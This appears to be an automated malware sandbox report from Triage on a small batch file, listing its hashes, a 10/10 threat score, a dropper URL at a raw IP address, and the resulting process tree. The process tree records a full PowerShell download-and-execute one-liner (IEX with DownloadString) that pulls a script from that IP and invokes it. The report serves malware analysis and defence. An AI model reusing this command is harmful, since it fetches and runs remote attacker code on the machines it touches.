0152af15e9235a11368c7777e3d71e92c99fadbe9392a54acfab853445a9c50d | Triage

Analysis

max time kernel
132s
max time network
73s
platform
windows10_x64
resource
win10v200430
submitted
02-06-2020 10:10

Sharing

Report Analysis Logs

General

Target

bd978ef89b238bfae52044568aa42c75.bat
Size

216B
MD5

f0df01a4173ce448321aea96ca779d4e
SHA1

ad432c315a539443f75f5c2456748c6e8b5d5c4f
SHA256

0152af15e9235a11368c7777e3d71e92c99fadbe9392a54acfab853445a9c50d
SHA512

08f9b9f0067ace92197239000cc1bed35239c6cfad5d60e2e388189b38affebd639a6e2c52e120e2cf8ba58c8e00b2035ff9536d00a41d844d8df68556504055

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/bd978ef89b238bfae52044568aa42c75

Signatures

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1080 1420 WerFault.exe powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

WerFault.exe

description pid process

Token: SeRestorePrivilege 1080 WerFault.exe
Token: SeBackupPrivilege 1080 WerFault.exe
Token: SeDebugPrivilege 1080 WerFault.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

WerFault.exe

pid	process
1080	WerFault.exe
1080	WerFault.exe
1080	WerFault.exe
1080	WerFault.exe
1080	WerFault.exe
1080	WerFault.exe
1080	WerFault.exe
1080	WerFault.exe
1080	WerFault.exe
1080	WerFault.exe
1080	WerFault.exe
1080	WerFault.exe
1080	WerFault.exe
1080	WerFault.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\bd978ef89b238bfae52044568aa42c75.bat"
1⤵
PID:1152

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/bd978ef89b238bfae52044568aa42c75');Invoke-UNXZXCRBF;Start-Sleep -s 10000"
2⤵
PID:1420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1420 -s 704
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1080

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1080-0-0x0000000004500000-0x0000000004501000-memory.dmp

Filesize
4KB

Download
memory/1080-1-0x0000000004B30000-0x0000000004B31000-memory.dmp

Filesize
4KB

Download